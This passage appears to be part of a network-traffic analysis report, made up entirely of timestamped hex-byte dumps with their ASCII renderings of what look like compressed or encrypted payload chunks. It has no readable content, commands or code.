                                                                                                                                                2022-09-29 12:51:45 UTC20089INData Raw: fc d2 c7 ad 35 02 22 9b 4f 13 47 52 26 e5 79 f2 a1 7e 83 47 63 6a f5 c1 71 6a e4 c0 cc b5 1c 1b b4 08 48 12 e7 75 6c 9a a0 7e 48 bb c8 2d 7c d1 8d 12 49 b7 30 d6 42 06 80 2a 86 a2 e7 49 53 2e e5 e7 9e eb 35 71 30 07 90 dc 6f 0d 83 ae ae c0 c2 cc 4c 57 f8 d3 1e 10 4a b9 7b 57 38 38 36 64 77 3c b1 f8 c4 f6 f1 4e 4d 50 06 28 0b a2 68 c9 5a 26 9d 94 a6 7c a9 3c bb 1d fe cb 52 e8 8a 0f 26 77 c9 0c f0 66 55 f0 44 bc d8 ae 36 ee 45 26 35 5e 36 63 32 fc 36 6b 75 ef a2 0e 4a 46 99 4d 4b cd 81 03 bc c4 86 15 b1 2e 1d 83 9b d3 3e f2 ba f8 58 02 5e 54 03 d9 a2 9f 31 0c 2c 7c 97 32 9b f8 f9 fe db 41 1f 3a 7a 8f 7b 71 e1 7c 24 3c ff 45 51 d0 04 66 57 b3 fe 7c 20 39 97 a4 f7 a2 ca 7e 75 6a d7 56 93 b5 c9 72 27 b0 0e 60 0f bc a2 6b f6 77 14 16 d4 96 19 eb 63 8e 02 40 90
                                                                                                                                                Data Ascii: 5"OGR&y~GcjqjHul~H-|I0B*IS.5q0oLWJ{W886dw<NMP(hZ&|<R&wfUD6E&5^6c26kuJFMK.>X^T1,|2A:z{q|$<EQfW| 9~ujVr'`kwc@
                                                                                                                                                2022-09-29 12:51:45 UTC20105INData Raw: 33 ab 96 fb 40 ad c7 90 48 f0 e0 19 ff 4f 51 ba 46 0c 70 ab 00 1a a1 c1 f8 1f c1 10 e8 f0 7e 13 9c 17 29 c2 31 df 61 fe 22 08 9f c3 49 15 cc 19 ae 26 03 59 c2 e9 0e b5 12 63 10 e0 02 ca a2 9d d0 ea ff 97 3f 56 8a 59 0e 50 4a 6a 53 93 e4 79 69 5c cc c0 5a 54 f7 9b 4b a1 f0 e0 f6 13 f0 a2 60 ed 3f ee f0 a2 f4 1b dd 85 8e 07 0c b4 df 04 2c 43 10 e7 71 75 3f 98 cd 90 5f 7f 3b f8 05 5c a5 b8 a3 4c a7 12 8e 86 2f 16 ef be bb 9f 07 22 be 87 5c ba aa ce 83 f2 5a 1f 64 65 b4 83 40 f0 2b 25 e8 3b 9d db b0 ef c9 63 84 62 d6 c4 d5 d0 a4 4a 28 aa 31 a2 e1 e7 31 cc 6a 65 e8 a9 19 6f ab 64 bd 67 dc ec c1 67 24 d6 80 c6 25 5a 9e 03 44 a8 bc 84 61 1c 34 b2 7d 12 ba 99 36 51 b3 f2 56 f1 fe 5a c9 83 68 c1 1f 77 0c b8 4c d9 b0 44 15 4a 71 ba e2 28 c1 ee 2c 9b d0 d9 5f 2f e0
                                                                                                                                                Data Ascii: 3@HOQFp~)1a"I&Yc?VYPJjSyi\ZTK`?,Cqu?_;\L/"\Zde@+%;cbJ(11jeodgg$%ZDa4}6QVZhwLDJq(,_/
                                                                                                                                                2022-09-29 12:51:45 UTC20121INData Raw: 45 fa 49 58 f7 75 9e ad c7 3a 55 fa 5b 9e d5 61 33 40 de ac 63 00 af 8d 8a d5 1c 73 76 9f 27 7d 8d 22 d6 4a c3 34 e5 d8 55 a7 6c 42 15 2c 90 5f 70 06 63 51 0b 37 58 19 2d 0a 37 eb 43 45 91 e8 73 81 71 a6 3d 7e 2d 4c d2 aa e6 81 c2 e7 e2 51 6a cc 48 87 7a 8d 4b e6 b4 21 6b 07 15 81 5a 84 2b a0 a9 ca ca 3b 62 89 92 e9 4d 89 32 a2 7a 4b 3b af b9 6a fb 7e de 6f d5 f2 8e a1 4b 03 33 9d 81 a7 b3 4a 5e 35 e9 64 2c 69 90 fc 1c 3b fd d3 3a dc 46 81 e5 29 2f 43 e9 51 6a 94 a5 1c 97 b1 de c0 55 f6 ae b2 6f b2 c9 e4 a1 25 df ea a0 83 72 9f 57 41 3c 4d 44 24 86 83 ef 0d 6f d8 fd 8f 78 5e f5 c8 ba c1 03 11 36 50 30 48 c5 29 a3 be 41 78 11 ce c4 48 48 89 ae 93 a7 75 52 f3 6f d6 65 f3 57 b2 05 d7 55 03 2f 67 cb bf bd c0 9c c9 a4 b3 f1 9a 0a a2 c3 f1 0d bc 15 67 c0 95 e6
                                                                                                                                                Data Ascii: EIXu:U[a3@csv'}"J4UlB,_pcQ7X-7CEsq=~-LQjHzK!kZ+;bM2zK;j~oK3J^5d,i;:F)/CQjUo%rWA<MD$ox^6P0H)AxHHuRoeWU/gg
                                                                                                                                                2022-09-29 12:51:45 UTC20137INData Raw: 92 32 b1 e3 6f 69 c3 6e 5d ee 05 c7 ce db 27 30 db 42 92 5a 9c ba 3c df 30 e5 85 82 ed 11 30 10 ce f4 27 51 d1 96 d9 07 ed b7 25 fd b7 0b d6 07 1e 77 5c ef f8 b7 14 09 6a ec 6b 75 a3 31 a2 27 3f b7 9e 08 e2 a8 6f 91 c5 16 b9 bf a7 ef bd c2 0c 86 90 6d 26 5a 4d d9 05 c2 22 61 30 14 b7 c1 cb 43 3c 3c 12 40 a5 46 de 08 fd 2e b7 a9 64 04 21 2b c0 7c 32 5f 13 6c 6f ff 9a 2e a2 d6 e1 d0 50 64 c5 bb 92 44 f6 b5 82 49 cd 97 cf 9f eb 9f bb 18 d5 fd 95 70 47 76 f8 dc a1 9b 79 7b 72 59 16 74 d2 e8 33 6f 32 87 33 1a 63 b5 a6 d5 14 ce c7 6d 0c 11 09 5b a2 9e 9b 5c 2c 39 45 49 0c 03 5f 48 8f db bf 2a 42 1f 8c f3 bb 26 09 ef ef 20 08 b3 2c 49 4d 16 1f eb 66 30 e1 85 a9 ab 37 0e 88 15 1e 0e ba 38 a5 87 90 45 fe a2 95 29 33 5a 6a c8 1a a7 ab 9e 44 57 f6 5d d8 23 0b 1a 95
                                                                                                                                                Data Ascii: 2oin]'0BZ<00'Q%w\jku1'?om&ZM"a0C<<@F.d!+|2_lo.PdDIpGvy{rYt3o23cm[\,9EI_H*B& ,IMf078E)3ZjDW]#
                                                                                                                                                2022-09-29 12:51:45 UTC20153INData Raw: 61 10 36 11 0f ba ec f3 90 2c a9 67 ea 60 12 f6 ad dd ed 67 42 19 70 87 d8 57 8f 10 72 60 3d 57 2e b5 8d 66 c5 15 d6 77 b2 34 34 d9 82 c9 80 5f 40 46 a9 fe 74 97 47 29 c2 2b c2 42 e5 95 2c ec 01 64 a7 e2 d4 f3 86 eb 73 85 e7 ed 8c 53 4e 95 36 15 f7 8c 9f db bb 55 b2 0e 60 95 b9 4c 3f 1e 6e 86 b6 97 ba 7c 35 8f 60 1f 3d 71 19 7f 58 f2 b8 65 be c5 14 9e 95 02 70 10 e8 4b c3 00 f2 6e 3b 9c c3 53 18 2c 71 ee e4 76 0d 97 3d 1f 91 75 2c 37 8f 18 12 d8 8d 01 2d 62 6e 95 c3 6e dc 67 a1 12 a8 31 d5 07 20 7a 47 10 22 b5 97 67 e2 7c 92 c5 fe 5f 33 a3 0c 8b a0 04 69 05 f0 e2 3d 65 ac b2 bf 21 1a 42 06 e9 e1 9a b4 7b e5 fb 29 f5 b9 f8 e5 41 8b dd c2 17 12 c3 d2 f6 69 fb 60 13 60 69 ad 72 de 6a 4c da 8e ff ba 2c 83 0f 79 f4 87 f6 c5 85 fc 72 b9 b7 68 6e f8 4c 48 30 64
                                                                                                                                                Data Ascii: a6,g`gBpWr`=W.fw44_@FtG)+B,dsSN6U`L?n|5`=qXepKn;S,qv=u,7-bnng1 zG"g|_3i=e!B{)Ai``irjL,yrhnLH0d
                                                                                                                                                2022-09-29 12:51:45 UTC20169INData Raw: 16 c7 f2 a9 90 d5 e8 e2 85 fb 7a 7e 77 22 3d 1c ae bf f1 cc 71 b6 f0 28 8e ff 2b b0 25 69 fa b5 e5 68 94 f2 64 40 29 5c 1f 1d 56 2f 7f 7c 12 fc f8 18 ec 9b c2 15 a9 1d 25 6c 04 af b9 b4 42 f8 0d 88 d0 87 07 dd 8d 30 f0 95 4e 83 9b 8b e3 27 25 a0 ee 55 d4 b7 d3 c0 73 a1 1d 4f f8 d0 66 76 ff ac f4 84 a0 cc 9d 32 77 f9 00 c2 b9 33 c2 33 28 d5 f2 d0 e7 1a 08 7a 51 58 5e 31 87 12 5b ce 9c d7 cd 2f c1 e1 bb f2 0c dd a4 7e 5e 8b 39 70 bd 9a 3b 3f 00 d7 dd 8c ec 4f ad 2e 7c 34 fd a4 e5 6d 6e c9 de 13 ab 31 79 4e e0 25 51 f1 78 c4 2f 61 0e c4 a1 ed a5 fe 43 b0 48 d0 1b f4 ad 87 f6 18 02 41 fb 99 6c 20 48 d4 c1 f7 fc 7a 0e a3 2a 49 83 1e 5a 20 49 b3 9e 9d 21 23 20 3f 83 ee 82 51 49 55 18 fd f7 fe 07 59 77 e9 c1 59 89 15 7f 1a ff c4 67 9b b0 78 8c a3 22 f0 07 c0 7a
                                                                                                                                                Data Ascii: z~w"=q(+%ihd@)\V/|%lB0N'%UsOfv2w33(zQX^1[/~^9p;?O.|4mn1yN%Qx/aCHAl Hz*IZ I!# ?QIUYwYgx"z
                                                                                                                                                2022-09-29 12:51:45 UTC20185INData Raw: ce 36 61 04 d6 31 80 45 e0 37 5c 8c db 15 89 13 6d db 87 24 a8 2c be b3 39 ee c7 aa 6b a2 6c 9d 78 fa aa db 9d 9a 19 d8 a5 5a 0c eb c8 9c 5a ec 4e 21 9a 85 69 89 4f 06 1c 58 af 52 ae 69 3f 36 02 8f f0 dd 3e 02 c2 d8 d5 9c 63 ae 85 45 9f 0c 43 87 a8 94 65 1f 8c 39 fb 8b 76 f8 a4 8e e1 c3 e2 57 f8 97 ee e0 74 dc 3b f6 c2 db 8c 9d 24 1f 12 73 19 3a 33 56 e1 15 63 fc 0d 2b 02 d9 9d 39 81 5c 98 9b 48 a5 12 10 da 54 0e 6d ee 21 29 77 26 0e 61 3b 9a 63 73 c1 b6 72 fe 56 80 50 34 17 d7 47 09 10 c4 6c a8 ac 5a 53 08 ca af 4c 6d d6 ee 53 53 66 58 8d 1c b1 96 a7 b4 91 ab f8 a7 58 9a c9 b5 0a 89 3f c0 9e d1 89 09 66 9f cf f5 da 7d b1 c7 89 7b 8a 93 40 ec a9 41 75 e7 57 95 39 e7 0f 8f a0 6c 72 0e 3d 2e 15 52 8b bc ec ff d5 3d 0d cb e3 4f 85 da 71 b2 1d 6d 28 d8 ae 84
                                                                                                                                                Data Ascii: 6a1E7\m$,9klxZZN!iOXRi?6>cECe9vWt;$s:3Vc+9\HTm!)w&a;csrVP4GlZSLmSSfXX?f}{@AuW9lr=.R=Oqm(
                                                                                                                                                2022-09-29 12:51:45 UTC20201INData Raw: 6c 77 69 bb dd 14 ef 4d 94 d6 23 c5 76 8d f5 c2 69 4d c2 c7 ff 07 41 1a a2 c4 f4 fd 78 1c d8 96 6d 96 65 1d 53 db 34 51 ab d9 10 38 46 7f 69 4a 2e 81 af 80 ed eb a0 c5 52 65 4f f4 1e e5 12 67 81 d5 f9 52 3c 8f ac 8f 3a 05 ce 7c 23 4b 7a 0b 67 4c e8 6e a2 00 33 2f c6 d3 bd 29 77 15 c9 e5 ea e8 2b 34 0a ec 9e d1 ab f2 ab da 14 63 86 95 9b 53 92 f4 3b c4 34 30 31 6f 87 66 4a 85 50 d3 7c a7 8f cd 1f bf 0c 7e 3a 26 19 b6 da 3c bb ee f8 0c a3 00 73 8b 3c 85 72 c1 32 d8 94 1f bf 3b de 18 a7 a3 7c 76 6d 36 da 36 dc 12 f1 49 c3 d6 d2 61 77 68 25 e4 01 06 4a 39 3d b7 57 70 5e 0b 03 81 9d 1d 25 86 6f a0 27 dd e5 8a 36 c2 be 81 8c 6d 19 96 65 bc 4a 33 73 1f d0 c9 8c 91 2c f9 3f ec e9 35 2b 2a 7a 6e 8c 6a 0b b6 a0 c5 ab 2e 9b 42 21 ca 78 cc cc 91 05 04 cf 20 3a d1 44
                                                                                                                                                Data Ascii: lwiM#viMAxmeS4Q8FiJ.ReOgR<:|#KzgLn3/)w+4cS;401ofJP|~:&<s<r2;|vm66Iawh%J9=Wp^%o'6meJ3s,?5+*znj.B!x :D
                                                                                                                                                2022-09-29 12:51:45 UTC20217INData Raw: 58 e1 c5 2c fc 45 76 32 13 37 f8 18 39 6e 82 66 ac 13 58 e5 2c 36 d2 9c 77 5d ab 29 c2 2d b2 1b 63 2a 25 01 19 c4 c0 ba 91 7f 16 d3 eb c3 40 9e bc 62 46 8f 84 38 58 85 00 40 be 07 aa aa 02 8b 9a a8 3a 5c 5b ea 2f a0 d4 64 be 9e 33 de 51 1c ce e0 dc 8d dd 64 78 5c e8 08 97 64 97 05 8f d1 6f 50 44 cc 34 2f 5e 11 23 c3 35 04 e0 e2 0e 43 ef 95 05 6e 57 73 91 8e 9e b2 0f aa a4 22 c2 fd 60 26 89 bd 3a 84 29 40 c6 18 31 0b 7b 16 a9 1d 55 75 4d 7c 51 00 2d 98 4d eb 1e 8b 7b e0 4f 25 6f 53 53 7b 20 78 1e 7b f2 2d 4e 93 a2 65 d6 a2 33 97 9a ad b3 e1 9d 7f 8b e5 f7 9a 0a 9b d6 c2 a6 c7 2c 7c cf 69 73 d8 69 d8 6e 43 64 7d 97 34 ab 41 bf 68 74 a5 30 12 0d 1a ec 89 23 00 37 bb 4c 81 4e 20 02 d1 6c d1 12 84 9b 3c 60 dd 89 c1 0e 05 7b f8 43 2f 32 e0 d5 80 15 5f 2e 95 95
                                                                                                                                                Data Ascii: X,Ev279nfX,6w])-c*%@bF8X@:\[/d3Qdx\doPD4/^#5CnWs"`&:)@1{UuM|Q-M{O%oSS{ x{-Ne3,|isinCd}4Aht0#7LN l<`{C/2_.
                                                                                                                                                2022-09-29 12:51:45 UTC20233INData Raw: 65 49 d8 f1 bf ed 2c 8a 10 84 f3 1b fd 9a 7f 6b a2 96 c3 b7 2b cb 31 2c a1 64 71 22 db 94 7c 62 d5 c1 db bb 8f 8d 47 44 be 53 16 de ee b6 ab c6 a7 a9 3f a1 54 63 6b 97 9f a8 75 18 69 90 e4 10 ee 38 f1 5b e7 de cd c3 95 da d1 84 36 c0 8c 70 12 c0 09 9b ea 16 bf a7 28 0d 5f 0c 74 94 ea 3d 9d c6 35 f6 a3 32 0c ed ab 31 11 b9 8e 32 3c 03 b9 c2 40 43 11 b7 db de db ec a1 29 ce 34 bb 0c 5b 13 c1 45 9b 50 fc 91 96 98 55 06 d6 f8 ba 76 f6 a7 45 e1 c3 97 2b f3 0c fc 7c cf c7 65 2d 18 57 3d 78 7c 03 ed 49 ae d5 b0 33 29 0f 67 16 ff 76 ce 81 57 e4 e4 23 27 d5 b6 6c 8b 4d 04 94 d0 a5 e3 ec 44 2c 87 23 a8 33 0f 6c 91 fb 56 6d ed 19 d7 e3 8f a0 b1 83 3c d9 dd 13 19 cd 7b ba 5e 41 ab d1 af 7d 40 af fe c2 c6 a4 86 70 04 8f 49 4b 4c 1b a7 45 4c c2 c7 22 0e c9 30 2e 43 56
                                                                                                                                                Data Ascii: eI,k+1,dq"|bGDS?Tckui8[6p(_t=5212<@C)4[EPUvE+|e-W=x|I3)gvW#'lMD,#3lVm<{^A}@pIKLEL"0.CV
                                                                                                                                                2022-09-29 12:51:45 UTC20249INData Raw: 41 f9 96 20 da 73 18 94 07 11 56 10 4c 05 f5 cc 76 01 94 be 0d a2 9a e7 40 81 0f 0c f5 bd 78 ce 1c b1 8c 65 64 70 25 7b 22 93 47 c5 e6 c3 8e 15 f5 39 77 77 54 a4 33 48 5c 5e 42 0f ac 53 d7 49 7b 29 db 9b db e1 b2 3a 46 ec 20 73 6d 36 e6 5b 3c af 24 1a 98 f6 bd 4f b0 22 8c 3f 52 11 ba 62 24 92 87 47 39 30 3e db d9 17 65 fb b8 c6 bb fe a1 8a a6 12 5d c0 1c b7 95 f1 1b f9 b2 1c 29 c1 fa bc 34 e8 e3 af 1b 82 69 42 c8 a4 24 35 e9 24 27 b6 12 b8 59 3c 69 fe 1c 34 87 c3 49 6d ff 91 85 34 f2 20 35 a0 21 a3 cf 51 64 14 d1 83 57 63 0a ef 07 dd f7 c1 d4 f3 91 45 fd 6a d1 3d f8 88 02 ee 1c dd e4 be ec 88 f9 99 c1 e0 cf 00 94 97 b7 20 41 25 91 94 bf 3a 41 71 1b c3 99 00 42 8b d9 45 dc fa 97 4d d4 31 80 e3 61 25 92 f7 9d a3 59 95 8c e3 f1 4f 0c 59 2c bc a2 2a c9 5c 9a
                                                                                                                                                Data Ascii: A sVLv@xedp%{"G9wwT3H\^BSI{):F sm6[<$O"?Rb$G90>e])4iB$5$'Y<i4Im4 5!QdWcEj= A%:AqBEM1a%YOY,*\
                                                                                                                                                2022-09-29 12:51:45 UTC20265INData Raw: be 13 4b 08 37 ca 9a 8f d3 bc bd 88 5b fe d9 58 ce 91 20 3f 0f 43 2c 69 66 13 9f ee ff 07 74 aa 2d e7 ed 1e 67 41 b7 ac 58 87 50 50 c9 ba 17 f1 e7 65 2c 88 a5 40 f8 19 d5 ba 37 60 52 ec c6 fc 36 52 ca 57 07 a3 ab 92 50 26 34 6e 11 44 e8 bf 26 aa ec 9c 06 8b fe 0a 4a 92 ac 9d 47 d8 4f be d9 18 14 7b 40 10 f1 62 07 d3 59 58 6e 2c ee 36 22 1f a9 77 2b de 4b 00 37 7f 53 53 54 2e 98 9e 5e d2 8c 8d 45 d3 23 6b ce 4e c9 7c ce 48 d3 52 84 a7 04 a1 93 3f 8b 6f 97 e6 19 ba 42 62 96 f9 e8 43 90 b2 24 11 32 86 08 16 43 bf d9 36 fe b6 4c be b2 21 b3 f7 32 b5 da 41 90 4d 66 1f 6a 75 6e 9f 4f 52 02 63 80 03 af b8 5a 58 64 2c cf 18 27 76 e6 9c 93 00 e2 b2 81 e8 34 12 0f db 2c c7 b5 48 d3 b7 80 21 57 d2 58 47 c1 24 c0 5e 24 f4 c8 a4 3c d1 23 02 9a ab e4 63 e4 fb 36 17 63
                                                                                                                                                Data Ascii: K7[X ?C,ift-gAXPPe,@7`R6RWP&4nD&JGO{@bYXn,6"w+K7SST.^E#kN|HR?oBbC$2C6L!2AMfjunORcZXd,'v4,H!WXG$^$<#c6c
                                                                                                                                                2022-09-29 12:51:45 UTC20281INData Raw: f4 74 87 3a 1e aa d2 e3 d9 17 58 93 19 87 17 3c b1 32 0a a1 cc 35 86 13 8f 28 55 42 da a7 29 3a ba d9 c8 a2 8e 2e bf 31 02 21 01 00 0e 74 51 95 1b e4 7d 63 88 a4 4b bd 9d 64 d2 15 d4 e0 b1 84 97 fa 5b 61 f9 3d b3 2d 44 4f ba 08 51 6e 13 82 1b 7f e3 63 8e a6 d2 df 5f 29 a2 8c b1 b5 bd 7b 7e b2 af bb 62 eb 0b d5 3e 35 c9 90 25 d3 9c c7 80 8f fb e2 24 f4 a2 96 91 3e 4e 27 e9 78 75 0d 52 ef 3c 56 0f b6 ae 24 3d 64 b1 5f 72 de 69 b6 e6 c8 dd b2 44 36 ce 6d 2b 02 6f de 56 bb f3 f4 b6 75 aa 35 a4 ec f6 b0 65 05 3f e8 4d 3c 27 33 55 91 9e b4 75 d5 42 fd 84 d0 c2 66 5d 9d 58 92 b4 3e ad cb 92 8c 8b ca a4 94 eb 51 81 de 69 91 da 77 01 69 e3 71 97 32 47 cb 20 d0 f6 e2 ad 89 4c c6 ed 44 06 0f 1a 33 03 ff d4 a0 46 2f 68 bb 99 2e 1c 93 d3 12 87 68 30 ef 1a 6a 02 12 0c
                                                                                                                                                Data Ascii: t:X<25(UB):.1!tQ}cKd[a=-DOQnc_){~b>5%$>N'xuR<V$=d_riD6m+oVu5e?M<'3UuBf]X>Qiwiq2G LD3F/h.h0j
                                                                                                                                                2022-09-29 12:51:45 UTC20297INData Raw: 51 69 60 57 2c aa 50 74 d8 6d 34 9c 2d b4 4e 11 f7 85 2c a5 fa d7 d1 da 57 04 4c 42 fd b2 92 a6 6c 7e 3a 89 69 12 b0 f5 ae 49 2a 0c 9c e0 0a 67 ce 26 77 bd 6c aa d4 0c 8f bb 0a dd b0 0b 7c 69 dc 8e bd eb 3b 24 47 c8 92 87 e4 7e 4e 90 ed cc ba e3 90 c3 97 41 e7 e8 f8 5a 0e e4 9e 82 f2 4c b3 01 4b 97 66 e0 a1 ba 35 30 2c db 8c fa 1f 79 b9 91 9f 60 58 e8 3c c7 de 6c 5c e6 f9 33 3a c2 29 c9 1a a2 b4 88 32 4b 90 c5 be 27 88 c9 42 9d c6 99 89 b1 07 62 56 7d 5b c5 b2 03 79 01 c1 6c 55 57 cc c8 32 8e 00 e6 5b 51 07 d1 e7 3f f0 9b c8 27 58 a5 d2 a0 32 84 06 9d 36 82 5a 58 5f d8 73 85 6f db eb 51 12 91 c1 86 d1 1e 68 dd b2 90 fe 96 c1 c0 8c 53 5a 8c 07 15 72 ca cc c5 99 20 b3 02 dd 43 66 4c 17 27 b2 2f 79 bf 84 48 7e cd 9f 39 e3 c7 77 96 0f 7d 48 0b ad 48 21 a4 d1
                                                                                                                                                Data Ascii: Qi`W,Ptm4-N,WLBl~:iI*g&wl|i;$G~NAZLKf50,y`X<l\3:)2K'BbV}[ylUW2[Q?'X26ZX_soQhSZr CfL'/yH~9w}HH!
                                                                                                                                                2022-09-29 12:51:45 UTC20313INData Raw: d4 ea 44 a0 20 d4 81 48 3b 3d c8 b2 50 c6 9a b2 f6 f2 09 07 48 56 08 ce 3d 94 5a ed 55 54 80 63 11 3c 0b c1 f0 d6 31 dc fb 18 ea 7a f7 66 2b f6 13 f2 7a 05 fb 49 6a 25 73 f7 dd 27 bc bc 00 ca 21 3a 5a 66 c3 83 e6 45 ec 5c 97 92 2b b1 99 74 e6 41 f9 89 17 74 bc db 50 67 b7 43 52 f5 ac 78 dd 55 1a f9 67 f0 eb f2 0e 74 84 6b 35 bf 0b 35 ee c0 a5 81 1d 73 4e 41 34 0b 3b f1 32 04 a2 7a b6 5c b5 f0 3c 71 be e4 80 26 47 b7 7b 8c 35 14 39 be 08 da 33 7e a4 b5 be a9 9d 36 94 ce 28 10 4e 7c da ab 12 e1 e8 43 62 b3 7c 36 53 27 e1 a5 aa 5c ee 04 4c da 27 fd 14 02 50 57 55 09 2d f6 ac 6a b5 a5 b4 8d f7 56 02 51 64 1f ff 08 74 fa be 0e cd 3c 0e 72 27 c1 a3 b3 0c 6b 1c 3a 82 d8 a8 db 9e 29 44 aa 67 5c 61 a7 5c ec 28 79 ce f0 f7 dc 7d d1 44 f8 41 92 7b 42 57 9b 3e e4 32
                                                                                                                                                Data Ascii: D H;=PHV=ZUTc<1zf+zIj%s'!:ZfE\+tAtPgCRxUgtk55sNA4;2z\<q&G{593~6(N|Cb|6S'\L'PWU-jVQdt<r'k:)Dg\a\(y}DA{BW>2
                                                                                                                                                2022-09-29 12:51:45 UTC20329INData Raw: d4 79 64 20 2e af 01 b8 9f 81 93 4a 0e a9 f8 27 55 79 8a 84 fd 26 12 ba fd e1 de 80 48 26 0c ce 2a 9f 9a 8f 27 aa f7 4d bf 36 91 05 c7 b1 25 64 69 06 2d 35 d1 b8 e7 0b 88 cc 57 41 30 5a 2c db 87 e0 62 22 e1 75 9b ba 56 4b 22 d8 71 5a 9c 28 4b 5b 44 de a9 86 0f f2 12 52 01 df 2f c1 80 5b 5e 1f f3 c6 3f 97 fe 4a d7 34 8e 1b 81 50 92 4d d3 07 d7 08 aa 48 7c 73 a9 9d 21 61 a8 0b ca 98 4f ca 5a 30 d7 43 6e 46 c8 5d 89 b4 1f f9 cb 5e c5 2b 20 ec 5a 69 f1 0a e0 25 ec a8 c0 5c ed 56 54 3b f3 2b 7d b7 7f e4 79 5a cd 6e 7b 3a f0 eb 3a 4b ed 8d 84 d6 f5 4a 98 3d 8b 6d 84 c0 6c 5c c0 d8 c4 14 44 62 c2 3f 36 fa fa a3 ee 1d 06 3b 6b 7d 0c d4 67 53 02 9d 3d 6e d7 3a d0 f3 71 d3 99 a5 8f 18 05 82 dd 94 13 2a d3 56 c7 2e 00 23 26 32 90 d4 11 74 c0 a3 c5 6b ee b3 14 6b 16
                                                                                                                                                Data Ascii: yd .J'Uy&H&*'M6%di-5WA0Z,b"uVK"qZ(K[DR/[^?J4PMH|s!aOZ0CnF]^+ Zi%\VT;+}yZn{::KJ=ml\Db?6;k}gS=n:q*V.#&2tkk
                                                                                                                                                2022-09-29 12:51:45 UTC20345INData Raw: 34 bd 06 b3 eb 4f a2 8d e5 cd 61 2b 97 f2 c5 65 16 4f 55 77 4c 66 ef 57 84 9a f1 83 49 9f 4f 11 48 a9 61 4f a4 ad a9 df 03 65 40 c9 0e 00 9e 98 70 e5 77 b8 92 e0 0f d5 19 02 52 1c 22 29 78 de 4e ec f0 3b 59 9d 30 38 fe 73 a4 11 98 94 0e 5a bb 9a 78 c4 b5 38 93 db f1 ae 44 f0 ec 68 53 17 93 fe 7a 66 2c 7e d1 c3 65 14 0a 09 cf 92 bc 96 5f 31 e8 c9 19 11 77 0d 29 05 bc 20 32 8f 33 42 bb 08 3f b9 0f 0a 11 34 f9 d6 fc df 63 ab d8 e4 df 15 d8 18 fd 5a 45 49 4d cf 76 2b 7f fd d2 05 a7 e7 2e 5e 52 52 05 0e c4 d5 50 f4 31 26 90 9d e9 80 49 a6 64 3e 19 61 9e eb 41 53 71 a1 fb c7 f7 a9 8f 6b 56 75 42 f7 77 40 5e 63 d9 80 34 4e 71 01 cb ac 95 05 15 00 9c 90 e8 7e 94 f1 51 93 9f 44 f6 eb ad 47 b2 7d ec d7 d1 20 be 31 d7 68 e7 f4 28 6d a1 ed 4c 05 1e 6b 54 85 ed 35 a3
                                                                                                                                                Data Ascii: 4Oa+eOUwLfWIOHaOe@pwR")xN;Y08sZx8DhSzf,~e_1w) 23B?4cZEIMv+.^RRP1&Id>aASqkVuBw@^c4Nq~QDG} 1h(mLkT5
                                                                                                                                                2022-09-29 12:51:45 UTC20361INData Raw: ca a9 ec fd 41 65 d5 d7 bb 77 2a bf 8b ff 6f 2f a8 af a7 9b ad 4c c9 96 b3 d9 7f 6e 8f 92 51 1d f2 4d ae 16 54 0d ef 1d c9 ec 64 b1 78 e5 95 0d bc b7 c5 2c 8d c2 23 7a 95 3c c0 58 34 24 99 2e 4a 45 fb a4 b1 6e 6f 6c 1c 3f c5 fc ea 06 f7 2c 93 db aa ac 72 47 b5 8d f1 26 85 cf 67 a0 70 d8 ff 4e 11 f1 b6 2b 0a 48 e9 3e b9 c2 10 fc 1b 79 6e d4 98 4e 95 35 4f c2 30 95 8a af d5 2b eb 55 44 44 e5 b0 40 9a 92 0c 7e b6 b1 41 b6 dd 3b 9b 77 eb 41 41 56 96 23 9f f3 fb 62 35 9e 35 62 a8 d2 c2 2a 44 73 f3 6f b6 c3 6b b6 7c 96 0f 16 f6 65 0d 03 97 90 18 e9 4d 5f a1 f2 e3 2a b9 03 f1 4c 4b 90 94 49 ac 98 2c 2c a9 17 44 ee e1 68 17 e7 a8 fc 5f 42 eb ce c9 5b f7 05 da 8c 56 30 8f 91 a5 54 32 5b 07 66 8f ef 31 5a 39 88 ce 53 3a 51 da ee 2a 08 33 a7 97 24 85 cc 38 f2 26 28
                                                                                                                                                Data Ascii: Aew*o/LnQMTdx,#z<X4$.JEnol?,rG&gpN+H>ynN5O0+UDD@~A;wAAV#b55b*Dsok|eM_*LKI,,Dh_B[V0T2[f1Z9S:Q*3$8&(
                                                                                                                                                2022-09-29 12:51:45 UTC20377INData Raw: fb 56 a3 0c 82 93 b2 5c b2 92 fd 6d da 5a d1 1b bb 92 49 b8 f4 49 1f d7 da bf d2 f0 a5 cd 2e 4d 79 6b 73 28 d9 93 fb 3b 23 16 26 8b ed b9 05 27 e7 cd b1 a6 98 c5 eb a6 04 b4 2f 32 20 ec 89 9e b1 65 7d 66 2e a9 eb 12 70 2b b0 b9 41 06 fb 1f c8 1d 56 36 f2 6d be ce 6c 1a 70 2c 85 f7 2d f9 7f 48 3e 49 33 f5 21 f6 44 ad 5d 42 ea 09 9a dc f2 5c 26 46 89 a3 e7 e7 b8 ce 8d 16 a3 8d b0 3a 61 a1 5a a4 1d 55 19 fd 88 7d 01 b0 97 42 e2 de 16 40 20 4f 62 79 6b 18 6b ff 37 16 73 00 80 72 51 38 a5 5e e0 d1 fc 64 28 66 75 fd a3 35 1d 13 34 87 de cd 23 0c c7 df ec a7 5c 63 4e 06 96 c9 0d d0 2f bf bb c5 48 84 c6 ae 17 e2 78 be b9 2e 51 b7 95 79 35 83 60 d7 1a c8 c1 aa eb 8d 29 46 77 b4 ff 3a 1a 88 0e aa d7 37 48 59 ff 65 7a d2 55 94 86 35 dd 91 35 64 ad b8 c4 c3 c1 5b d2
                                                                                                                                                Data Ascii: V\mZII.Myks(;#&'/2 e}f.p+AV6mlp,-H>I3!D]B\&F:aZU}B@ Obykk7srQ8^d(fu54#\cN/Hx.Qy5`)Fw:7HYezU55d[
